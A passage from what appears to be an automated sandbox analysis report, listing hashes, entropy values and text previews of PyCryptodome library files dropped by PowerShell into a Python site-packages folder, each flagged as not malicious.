                                                                                                                                                                                                                      SHA-512:1DA2FC49BF120BC6557CAC494B40E06DAC09CC0830FEE5E71A5A127CD460B367ADA5FFE1A58DC857560859E14E24F28B252581F57C6591C133036726A8FC61C5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........l.e..........................d.....g.d...Z.d.Z.d.j...................e.D...c.g.c.]...}...e.|...............c.}.........Z.y.c...c.}.w.).)...Cipher..Hash..Protocol..PublicKey..Util..Signature..IO..Math).............0...N)...__all__..version_info..join..str..__version__)...xs....0.cC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/__init__.py..<module>r........s3..........................h.h....5.1...A....5..6.....5s......-.
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):9180
                                                                                                                                                                                                                      Entropy (8bit):4.915391122855059
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:dmQHvdfT4geS1ztF9+hMkRI4H1Fit/zyc/Kr/yRAL:sedfTTt4Ot/L/KUAL
                                                                                                                                                                                                                      MD5:CD9EB61F9BE79E621B31443758388FCC
                                                                                                                                                                                                                      SHA1:FC5C64FA12AE0F08E7E12A1AEDD3253A30D633CC
                                                                                                                                                                                                                      SHA-256:B6EFBE8172803B4B8F886453F49396A9D65DA9D1E9D4816F35605F3332B43573
                                                                                                                                                                                                                      SHA-512:75FA164F181474A32E5A3C9361228FE8BA2AEB32B99F01455C649B926D367C17B2B2F762A940687F42BF20060816EBC5F400FF5EBF106E78DC9082C9ED4803B2
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# Cipher/AES.py : AES..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# =====================================
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3819
                                                                                                                                                                                                                      Entropy (8bit):4.806572670333257
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:5FYAgGWG6WcWUjmKokLSL0jcj9yYFtpZuObl9gbiYbwJbzk:58ZoUW0jcj9yYFtpZuObfgbiYbwJbzk
                                                                                                                                                                                                                      MD5:39C62D7749149CEFCA56CD8924566FCE
                                                                                                                                                                                                                      SHA1:354C63D5279D521E27C6AE448E3161812B5FD46E
                                                                                                                                                                                                                      SHA-256:880C7604F5F9CBEAEE58E411F15880F0908F1A276F1E0B7817A6F9ECE8513FDB
                                                                                                                                                                                                                      SHA-512:009CC6DEC9ACA8000038449669B6023935010F0D8B365018516A4BD870C51073591E9E3B0A91DD251F9196865BA946D4B08E6F65AB4CAC8097E2B0AD8329DA80
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Dict, Optional, Tuple, Union, overload..from typing_extensions import Literal....Buffer=bytes|bytearray|memoryview....from Cryptodome.Cipher._mode_ecb import EcbMode..from Cryptodome.Cipher._mode_cbc import CbcMode..from Cryptodome.Cipher._mode_cfb import CfbMode..from Cryptodome.Cipher._mode_ofb import OfbMode..from Cryptodome.Cipher._mode_ctr import CtrMode..from Cryptodome.Cipher._mode_openpgp import OpenPgpMode..from Cryptodome.Cipher._mode_ccm import CcmMode..from Cryptodome.Cipher._mode_eax import EaxMode..from Cryptodome.Cipher._mode_gcm import GcmMode..from Cryptodome.Cipher._mode_siv import SivMode..from Cryptodome.Cipher._mode_ocb import OcbMode....MODE_ECB: Literal[1]..MODE_CBC: Literal[2]..MODE_CFB: Literal[3]..MODE_OFB: Literal[5]..MODE_CTR: Literal[6]..MODE_OPENPGP: Literal[7]..MODE_CCM: Literal[8]..MODE_EAX: Literal[9]..MODE_SIV: Literal[10]..MODE_GCM: Literal[11]..MODE_OCB: Literal[12]....# MODE_ECB..@overload..def new(key: Buffer,.. mode: Lite
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7201
                                                                                                                                                                                                                      Entropy (8bit):4.785991204595467
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:dHQHv8g/lA2jSkmRFmynD/t4AKdRYotKI:te8gdA82jnD/t4hjYotKI
                                                                                                                                                                                                                      MD5:45EE5FBBE8CBB63C055973EC05CEEDB9
                                                                                                                                                                                                                      SHA1:85FE3E624A7D3BC461C4A879B98A17BF44E32494
                                                                                                                                                                                                                      SHA-256:57D9FCE3483474DD53D13A6DCDD3E6993EA5B3DD7480B7BC85C6A8D4A6E1DD9F
                                                                                                                                                                                                                      SHA-512:B7A92309FCFF306310C97750E65C075238DD1D55BE5958850F69580299C77DA3997451A2F4A2C4BF1BB056A0CA4752367A4A23ACF5CDAE298AD616CB11D8D287
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# Cipher/ARC2.py : ARC2.py..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1048
                                                                                                                                                                                                                      Entropy (8bit):4.936743654874026
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:1RENAAI1QJSzJSVJuJSpJQlJdvpB+yE2x/NEo0EDNqDNMN3zb1DoeRHYO:K+1AgGWG6xx9GIJqJejbFoeR4O
                                                                                                                                                                                                                      MD5:ABC0C75BDCA256568739E75069C630CF
                                                                                                                                                                                                                      SHA1:997D0DF67289A92CE181B9906C27EEBC96614021
                                                                                                                                                                                                                      SHA-256:C724C1EB1442CAEEE70643125D96DE0A7793A2E8470775E5D1E7628FCA67AF82
                                                                                                                                                                                                                      SHA-512:0E2729C803A2143AC70A26FD2D69067E8DA974BA56140326C71DAA3DF87286BB2E30C1C9A35BA4BACDDE7BFA34339F3B6EBD03150376A799CC9FC47FDCD79E6D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Cryptodome.Cipher._mode_ecb import EcbMode..from Cryptodome.Cipher._mode_cbc import CbcMode..from Cryptodome.Cipher._mode_cfb import CfbMode..from Cryptodome.Cipher._mode_ofb import OfbMode..from Cryptodome.Cipher._mode_ctr import CtrMode..from Cryptodome.Cipher._mode_openpgp import OpenPgpMode..from Cryptodome.Cipher._mode_eax import EaxMode....ARC2Mode = int....MODE_ECB: ARC2Mode..MODE_CBC: ARC2Mode..MODE_CFB: ARC2Mode..MODE_OFB: ARC2Mode..MODE_CTR: ARC2Mode..MODE_OPENPGP: ARC2Mode..MODE_EAX: ARC2Mode....def new(key: Buffer,.. mode: ARC2Mode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgpMode]: .
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):5264
                                                                                                                                                                                                                      Entropy (8bit):4.723907196612077
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:dHIB0jcQHMsvI/S3oCFGddiIzkHzgirvNZEgR2lYvHipJjHeLEyEMWnP7a7j2VP4:doFQHvo7mIzodGgR2uvi/jqEyExPNOuG
                                                                                                                                                                                                                      MD5:4B973975D3C6FCC22FD8C0582F4CB87A
                                                                                                                                                                                                                      SHA1:FA05064405DDE7B726B3AB8CA259BC6A3B33048A
                                                                                                                                                                                                                      SHA-256:0152A932BC4B0E5238AF5C9C145EF25A69E66E395804A700D60FBCEE80E5EC8C
                                                                                                                                                                                                                      SHA-512:439A24E44AEFF220F266ED46F6F1D66B98CB0C35134D412A6084267C8DAD9E550EDFF10C2510B4E25A55B43BE6B8D4437B4393D05322E418E1606605408029A9
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# Cipher/ARC4.py : ARC4..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===================================
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):438
                                                                                                                                                                                                                      Entropy (8bit):4.892911336139007
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:1REYBdHgMJjWrMRyDWeXRyc1APyMFq6R5wnZ0R5AomWL7Ry/O:1REUAIWrQFeBFAfnRe+RGorVYO
                                                                                                                                                                                                                      MD5:F00CD9D3130AA368D5F1F10B93E0A612
                                                                                                                                                                                                                      SHA1:E9C27B3918320183E7366BD1D1294B48EAC93378
                                                                                                                                                                                                                      SHA-256:28855BC2FF6531EFD40C42075EB5E506AD8A5F8D98B8041FB218725C7C484054
                                                                                                                                                                                                                      SHA-512:228840E70CD9FAD2CB8EA202BD45931614A9E26C619ECDBC017E832B3588C85B0BBA97B762A804DB16BE3D19481B1CC17AB616FE66D46FD66DCB38B132D2994A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Any, Union, Iterable....Buffer = bytes|bytearray|memoryview....class ARC4Cipher:.. block_size: int.. key_size: int.... def __init__(self, key: Buffer, *args: Any, **kwargs: Any) -> None: ..... def encrypt(self, plaintext: Buffer) -> bytes: ..... def decrypt(self, ciphertext: Buffer) -> bytes: .......def new(key: Buffer, drop : int = ...) -> ARC4Cipher: .......block_size: int..key_size: Iterable[int]..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):6135
                                                                                                                                                                                                                      Entropy (8bit):4.916553423672799
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:doFQHvofgiN8jEuVDYsgiiJsJWkGI9gmJt4qeA//RFWotKj:deQHvogZSniiSYkGIOmJt4A/RYotKj
                                                                                                                                                                                                                      MD5:CCFA29BA2814523ADF58AA9F7D0624EF
                                                                                                                                                                                                                      SHA1:46BEA4FF5A931B96D08598C66530EA911F7E4BA8
                                                                                                                                                                                                                      SHA-256:297D5A2E4EB626583EDC3E8C39194770B27773A8DF00C17D71CE0B7E6F5DE00B
                                                                                                                                                                                                                      SHA-512:B87FADF5FB7BD18E50FED9D6B680848D0A2B99F94C1414DBD63C4F74A56B8EA4A82E71FFE56ADD3A1604182DEAA3D7EF438439F122CE9799A7045154688E65AB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# Cipher/Blowfish.py : Blowfish..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========================
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1084
                                                                                                                                                                                                                      Entropy (8bit):4.920066075942964
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:1RENAAI1QJSzJSVJuJSpJQlJRvEStrF+olDNqDNMN3zb1DoeRHYO:K+1AgGWG6ltrF+wJqJejbFoeR4O
                                                                                                                                                                                                                      MD5:D0AED6A00929EE2C6DA6B409C012F5E2
                                                                                                                                                                                                                      SHA1:375CD151B552CA99011FF97581DD04BD33517FED
                                                                                                                                                                                                                      SHA-256:A363EF5A112333F407470A884E23357F1C251FE733091B95DC8E86AE3FF73A6D
                                                                                                                                                                                                                      SHA-512:147F1DE6BE32E1FCB88FFB0D37B765F5303CF2E7586CD405283FABD97A4D6714F011FDEE4A87B4777253BA41EC50C2A19D9DDACBB61C77E501D34D9999D55D08
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Cryptodome.Cipher._mode_ecb import EcbMode..from Cryptodome.Cipher._mode_cbc import CbcMode..from Cryptodome.Cipher._mode_cfb import CfbMode..from Cryptodome.Cipher._mode_ofb import OfbMode..from Cryptodome.Cipher._mode_ctr import CtrMode..from Cryptodome.Cipher._mode_openpgp import OpenPgpMode..from Cryptodome.Cipher._mode_eax import EaxMode....BlowfishMode = int....MODE_ECB: BlowfishMode..MODE_CBC: BlowfishMode..MODE_CFB: BlowfishMode..MODE_OFB: BlowfishMode..MODE_CTR: BlowfishMode..MODE_OPENPGP: BlowfishMode..MODE_EAX: BlowfishMode....def new(key: Buffer,.. mode: BlowfishMode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMod
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):6246
                                                                                                                                                                                                                      Entropy (8bit):4.847637515435151
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:d2QHvVgQ/KSnrF4xkOUBRkUtmz5t4AyRYotKw:UeVgQ/n549aW75t4rYotKw
                                                                                                                                                                                                                      MD5:5F1174F9FB32A4A834A3442B012374D4
                                                                                                                                                                                                                      SHA1:089EC31BB4CCF147FE6C073185B3EE182165EA03
                                                                                                                                                                                                                      SHA-256:E8BA9158AA0D7DC7A881CFD411602A4C626BB8CE6AAFC222C089DE5E6DFB9BC2
                                                                                                                                                                                                                      SHA-512:F9A053BE1F119C93EC3566127B3B681DF053696BA3DECB0D922D20E70428B73C995C6127819A30C08337E7B778C17B1C60315B1E8CE717D8A2223C00D3332A2A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# Cipher/CAST.py : CAST..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===================================
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1049
                                                                                                                                                                                                                      Entropy (8bit):4.934689035797648
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:1RENAAI1QJSzJSVJuJSpJQlJFivieL/tixsDOIosswDNqDNMN3zb1DoeRHYg3:K+1AgGWG6FQieL/tixsDOIYwJqJejbFF
                                                                                                                                                                                                                      MD5:BD0C5452D0C862F46720CDFB944FA7BC
                                                                                                                                                                                                                      SHA1:917D4020DBD2D124BAA89750FE347739BBF11D1B
                                                                                                                                                                                                                      SHA-256:1469D7505976C0A27F8B23F64E402BE8A897B00898539B5BB6803792178DFE1D
                                                                                                                                                                                                                      SHA-512:3143965EDF0205A84B28C34BA7F0EF005440D0F3EE431C06BC70E5FD09CEA0F0C2FF3C4C6E238D4628DB0AB1BE206DB60A4C76AD48B26B2FB3BEDDE2B1B81CCD
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Cryptodome.Cipher._mode_ecb import EcbMode..from Cryptodome.Cipher._mode_cbc import CbcMode..from Cryptodome.Cipher._mode_cfb import CfbMode..from Cryptodome.Cipher._mode_ofb import OfbMode..from Cryptodome.Cipher._mode_ctr import CtrMode..from Cryptodome.Cipher._mode_openpgp import OpenPgpMode..from Cryptodome.Cipher._mode_eax import EaxMode....CASTMode = int....MODE_ECB: CASTMode..MODE_CBC: CASTMode..MODE_CFB: CASTMode..MODE_OFB: CASTMode..MODE_CTR: CASTMode..MODE_OPENPGP: CASTMode..MODE_EAX: CASTMode....def new(key: Buffer,.. mode: CASTMode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgpMode]: .
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):11043
                                                                                                                                                                                                                      Entropy (8bit):4.627558249565941
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:9qrskrs9t3q/InHYkUlRGziNzvPppkzBjfgEcTUjwzgLMZKPOYbCCsrBUpt:0rskrs9Vq+HwlCihP8xfgZF6PPOvBUt
                                                                                                                                                                                                                      MD5:EF697474BC25613A648BE27414CCAE99
                                                                                                                                                                                                                      SHA1:4895C1724F80C956E85747E48D310BEE98CF55AD
                                                                                                                                                                                                                      SHA-256:2FE7CB61C0B983666475D35E906CF65D39F53D683A218F6712D3A973F33D35AC
                                                                                                                                                                                                                      SHA-512:07A0CED0253586F94B89BD9C033D66DA2E905C724800B38AD45A058F58A6ADDE3BE38E4D9D8849552F8523722D62DC675A30C77A2041146F48C4390373408A40
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):798
                                                                                                                                                                                                                      Entropy (8bit):4.852768717173627
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:1RE2AIM/sxQUADnRNne3yFnR3Fne3xodgxVYBy:3Me/4vesLehx+w
                                                                                                                                                                                                                      MD5:7311A085F06CFB4AF892363A4CB21E0E
                                                                                                                                                                                                                      SHA1:5DF2EEAE8BFD1978BE23CCDD2ECD712CFB79D6B1
                                                                                                                                                                                                                      SHA-256:CE31A7182E4369DC8F65D929813CE67E7AFA67ECEED9821B124BBEAB13D9E668
                                                                                                                                                                                                                      SHA-512:B6332CFB639FCF28701DF645276F21EA8535E6B401FDB6162E0F397B74FDBF47CECC10EE8B400278F268EBDAA1FF4C5A824BA408A03BE9A9CB9ADC167F61CA87
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Union, overload, Optional....Buffer = bytes|bytearray|memoryview....def _HChaCha20(key: Buffer, nonce: Buffer) -> bytearray: .......class ChaCha20Cipher:.. block_size: int.. nonce: bytes.... def __init__(self, key: Buffer, nonce: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... def seek(self, position: int) -> None: .......def new(key: Buffer, nonce: Optional[Buffer] = ...) -> ChaCha20Cipher: .......block_size: int..key_size: int..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):11929
                                                                                                                                                                                                                      Entropy (8bit):4.952377066202236
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:0qrskrs9t3q/IiAOqi/JHxbkg9XRV8psd6agIjjKVFtt:zrskrs9Vqai/j7XRViWnKVHt
                                                                                                                                                                                                                      MD5:2C073F0BF828114C27C68B959628B243
                                                                                                                                                                                                                      SHA1:1F816BBA3ED7D2BCAED9FC20B588D14266A109B8
                                                                                                                                                                                                                      SHA-256:9C4C95382B36B400CBD421C4CE51C20C6B5F405296CBE85EDF7EA87327F01BF7
                                                                                                                                                                                                                      SHA-512:70721C4BA6904BBC753EA40FD3439391FFD2A9CD1F5C7E337341426311AA8B2A56DB3F7BB5B07C5F82F11541BDDB984E8B32EEDD3548AABCCD4938561C9BE887
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2018, Helder Eijs <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1107
                                                                                                                                                                                                                      Entropy (8bit):4.862920256864568
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:1RElsAIfUA0nRNne3yFnR3Fne3TP/Wwn90nf5GodLVYBy:tfUJvesLeiwanoo+w
                                                                                                                                                                                                                      MD5:DED98A1B5B497FB5816021E8B6E5F6F4
                                                                                                                                                                                                                      SHA1:977F227DD05557AEDD8C40E653D74AEAF3734A43
                                                                                                                                                                                                                      SHA-256:6D880A3628C47D9BCE851019C82720D570F44699E1B453AF432AE4A7B20A1273
                                                                                                                                                                                                                      SHA-512:C6494CE19133C645285D7ACA56AD2F0D9E978ED2C4C7BB58A9C90B095A360DA3881E0D6F308F3B01508A331CCBF070690543BAC826FF47E8F9153949D92D9EF4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Union, Tuple, overload, Optional....Buffer = bytes|bytearray|memoryview....class ChaCha20Poly1305Cipher:.. nonce: bytes.... def __init__(self, key: Buffer, nonce: Buffer) -> None: ..... def update(self, data: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None: ..... def hexverify(self, received_mac_tag: str) -> None: ..... def encrypt_and_digest(self, plaintext: Buffer) -> Tuple[bytes, bytes]: ..... def decrypt_and_verify(self, ciphertext: Buffer, received_mac_tag: Buffer) -> bytes: .......def new(key
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):6121
